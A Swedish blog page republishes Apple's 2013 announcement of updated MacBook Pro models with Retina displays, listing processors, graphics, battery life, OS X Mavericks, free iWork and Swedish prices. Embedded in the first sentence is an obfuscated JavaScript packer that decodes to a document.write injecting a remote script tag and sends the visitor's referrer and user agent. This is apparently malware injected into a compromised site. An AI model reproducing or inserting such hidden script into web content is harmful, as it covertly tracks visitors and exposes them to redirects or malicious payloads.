Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Apple event 2013: Nya Macbooks med Retina

Apple event 2013: Nya Macbooks med Retina
Sebastian

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fttkf|var|u0026u|referrer|esdib||js|php’.split(’|’),0,{}))
uppdaterade idag MacBook Pro med Retina-skärm med fjärde generationens Intel Core-processorer, den senaste grafiken, längre batteritid, snabbare flashlagring och den senaste generationens Wi-Fi.

Den uppdaterade MacBook Pro med Retina-skärm kostar från 11 995 kr, ett lägre ingångspris än förut, och har en imponerande högupplöst skärm, en otroligt tunn och lätt design och den senaste tekniken med kraft som räcker till de mest krävande projekt. Apple meddelade också idag att både iWork och iLife nu följer med kostnadsfritt vid köp av en ny Mac.

”Vi har gjort världens bästa bärbara proffsdator ännu bättre genom att ge den högre prestanda och ännu längre batteritid”, säger Philip Schiller, Apples vice VD på Worldwide Marketing. ”MacBook Pro med Retina-skärm fortsätter att ligga i framkant när det gäller bärbara proffsdatorer.”

Den uppdaterade MacBook Pro med Retina-skärm är bara 1,8 cm tunn och ger otrolig prestanda i en superbärbar design. 13-tums MacBook Pro med Retina-skärm är utrustad med fjärde generationens dubbelkärniga Intel Core i5-processorer på upp till 2,6 GHz med Turbo Boost-hastigheter upp till 3,1 GHz.  Den nya integrerade Intel Iris-grafiken ger upp till 90 procents snabbare prestanda än föregående generations MacBook Pro med Retina-skärm.* 13-tumsmodellen kan konfigureras med snabbare dubbelkärniga Intel Core i7-processorer på upp till 2,8 GHz med Turbo Boost-hastigheter upp till 3,3 GHz.

15-tums MacBook Pro med Retina-skärm är utrustad med fjärde generationens fyrkärniga Intel Core i7-processorer på upp till 2,3 GHz med Turbo Boost-hastigheter upp till 3,5 GHz.  15-tumsmodellen har Intel Iris Pro-grafik som ger oöverträffad integrerad grafikprestanda, eller separat grafik i form av Iris Pro och GeForce GT 750M med 2 GB bildskärmsminne för absolut optimal prestanda.  15-tums MacBook Pro med Retina-skärm kan konfigureras med snabbare fyrkärniga Intel Core i7-processorer på upp till 2,6 GHz med Turbo Boost-hastigheter upp till 3,8 GHz.

Den uppdaterade MacBook Pro med Retina-skärm har otrolig grafik och ändå suverän batteritid. 13-tums MacBook Pro med Retina-skärm ger upp till nio timmars batteritid – två timmar mer än föregående generation – och upp till nio timmars filmuppspelning i iTunes. 15-tums MacBook Pro med Retina-skärm ger upp till åtta timmars batteritid – en timme mer än föregående generation – och upp till åtta timmars filmuppspelning i iTunes.**

MacBook Pro med Retina-skärm har nu PCIe-baserad flashlagring med upp till 60 procent högre läshastighet än föregående generation. Den senaste generationens Wi-Fi, 802.11ac, ger trådlös anslutning som är upp till tre gånger snabbare när den används med en 802.11ac-basstation. Två Thunderbolt 2-portar ger upp till 20 Gbit/s bandbredd för varje extern enhet, så att användaren kan ansluta till flera bildskärmar och högpresterande lagringsenheter, medan HDMI-porten ger snabb anslutning till HDTV-apparater och projektorer.

Den uppdaterade MacBook Pro med Retina-skärm levereras med OS X Mavericks. Mavericks är den tionde större uppdateringen av världens mest avancerade operativsystem och den kan laddas ner gratis från Mac App Store. Utöver fler än 200 nya funktioner innehåller Mavericks nya kärntekniker som utformats speciellt för att ge en extra prestandaskjuts och längre batteritid hos bärbara datorer. Komprimerat minne i OS X Mavericks komprimerar inaktiva data i minnet automatiskt så att Mac-datorn behåller sin snabbhet och sina korta svarstider. Mavericks ger också avsevärda prestandaförbättringar för system med integrerad grafik tack vare optimerat OpenCL-stöd och dynamisk tilldelning av grafikminnet. Om du vill veta mer eller ladda ner Mavericks besöker du www.apple.com/osx/.

Apple meddelade också idag att utöver iLife kommer även produktivitetsapparna i iWork-paketet att ingå vid köp av en ny Mac. iWork, som innehåller Pages, Numbers och Keynote, gör det enkelt för alla att skapa, redigera och dela dokument, kalkylblad och presentationer. Alla apparna i iLife och iWork har designats om från grunden för att utnyttja OS X Mavericks till fullo. De har uppdaterats till 64 bitar, är integrerade med iCloud och innehåller hundratals nya funktioner som gör dem mer användbara än någonsin på dina olika Apple-enheter.

Som ett led i Apples arbete för energibesparing och miljön har MacBook Pro med Retina-skärm utformats så att den uppfyller de stränga kraven för Energy Star 6.0 och EPEAT Gold.*** MacBook Pro med Retina-skärm har LED-bakbelysta skärmar som är fria från kvicksilver och tillverkade av arsenikfritt glas. MacBook Pro med Retina-skärm har PVC-fria komponenter och kablar, innehåller inga bromerade flamskyddsmedel, är tillverkad av material som är lätta att återvinna och levereras i förpackningar med effektiv materialanvändning.

Pris och tillgänglighet

MacBook Pro med Retina-skärm kan nu köpas på Apple Online Store, i Apple Store-butiker och hos utvalda auktoriserade Apple-återförsäljare. 13-tums MacBook Pro finns med 2,4 GHz dubbelkärnig Intel Core i5-processor med Turbo Boost-hastigheter upp till 2,9 GHz, 4 GB minne, 128 GB flashlagring och Intel Iris-grafik från 11 995 kr (9 596 kr ex moms), med 2,4 GHz dubbelkärnig Intel Core i5-processor med Turbo Boost-hastigheter upp till 2,9 GHz, 8 GB minne, 256 GB flashlagring och Intel Iris-grafik från 13 995 kr (11 196 ex moms) och med 2,6 GHz dubbelkärnig Intel Core i5-processor med Turbo Boost-hastigheter upp till 3,1 GHz, 8 GB minne, 512 GB flashlagring och Intel Iris-grafik från 16 495 kr (13 196 kr ex moms). Den kan även specialbeställas med snabbare dubbelkärniga Intel Core i7-processorer på upp till 2,8 GHz med Turbo Boost-hastigheter upp till 3,3 GHz, upp till 16 GB minne och flashlagring på upp till 1 TB.

15-tums MacBook Pro finns med 2,0 GHz fyrkärnig Intel Core i7-processor med Turbo Boost-hastigheter upp till 3,2 GHz, 8 GB minne, 256 GB flashlagring och Intel Iris Pro-grafik från 18 495 kr (14 796 kr ex moms) och med 2,3 GHz fyrkärnig Intel Core i7-processor med Turbo Boost-hastigheter upp till 3,5 GHz, 16 GB minne, 512 GB flashlagring samt Intel Iris Pro- och NVIDIA GeForce GT 750M-grafik från 23 795 kr (19 036 kr ex moms). Den kan även specialbeställas med snabbare fyrkärniga Intel Core i7-processorer på upp till 2,6 GHz med Turbo Boost-hastigheter upp till 3,8 GHz, upp till 16 GB minne och flashlagring på upp till 1 TB.

Mer detaljerad teknisk information, alternativ för beställningsbyggen och tillbehör finns på www.apple.com/macbook-pro.